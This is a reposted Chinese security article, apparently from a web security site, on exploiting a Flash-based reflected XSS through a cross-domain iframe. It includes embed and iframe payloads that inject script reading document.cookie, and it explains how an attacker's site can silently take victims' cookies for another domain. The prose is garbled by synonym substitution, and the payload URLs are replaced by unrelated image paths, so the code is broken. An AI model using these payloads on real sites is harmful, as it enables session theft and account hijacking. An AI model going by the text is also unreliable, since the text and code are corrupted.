|
|
|
联系客服020-83701501

基于flash的反射型xss的利用方法

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
基于flash的反射型xss的把持要领

克日在测试WEBQQ的时分,把持了这个,转头又在当地测试了一下。

—————————————————-

在当地 localhost建一个页面,进行了下列测试。

经过iframe调用传统的反射型XSS,因为iframe页面不合域,被IE9过滤器过滤掉,不实验。

Default
1 <iframe/src="/uploads/allimg/191104/0951252J5-0.jpg">

假定用普通的embed来嵌入FLASH的话,则弹出的是 localhost,即当前测试网页的cookies

IE下测试:chrome会溃逃.

Default
1 <embed/src="/uploads/allimg/191104/09512523P-2.jpg'<script>alert(document.cookie)</script>'%22})()"allowscriptaccess="always"></embed>

但是用iframe来嵌入FLASH XSS的话,就有心理了

测试代码下列(IE):

Default
1 <iframe/src="/uploads/allimg/191104/09512523P-2.jpg'<script>alert(document.cookie)</script>'%22})()"></iframe>

在chrome中,或者会导致阅读器溃逃,梗概改用下列代码。

Default
1 <iframe/src="/uploads/allimg/191104/095125N34-6.jpg"></iframe>

运行你会发现,弹出的是新浪域的cookies~

——————————————

因此当咱们发现 www.A.com 域名下的一个flash XSS

咱们梗概在 www.B.com域名下用iframe嵌入www.A.com的flash XSS文件。

当受害者,打开了www.B.com的域名时,咱们梗概获胜失掉其在www.A.com的cookies数据!

多么一来,攻击就变得更加潜伏啦~

原文链接:http://zone.wooyun.org/content/368

任务编辑:梧桐雨

91ri.org评:现在的xss更多的都是piapiapia弹窗弹的好开心,但是真正把持的没几个,91ri.org这里给自己介绍两篇实战文章《用xss平台消亡百度称扬核心背景》《当XSS蠕虫与QQ零碎消息推送双剑合璧以后…》

由网络平安攻防研究室(www.91ri.org)音讯平安小组收集整顿。

数安新闻+更多

证书相关+更多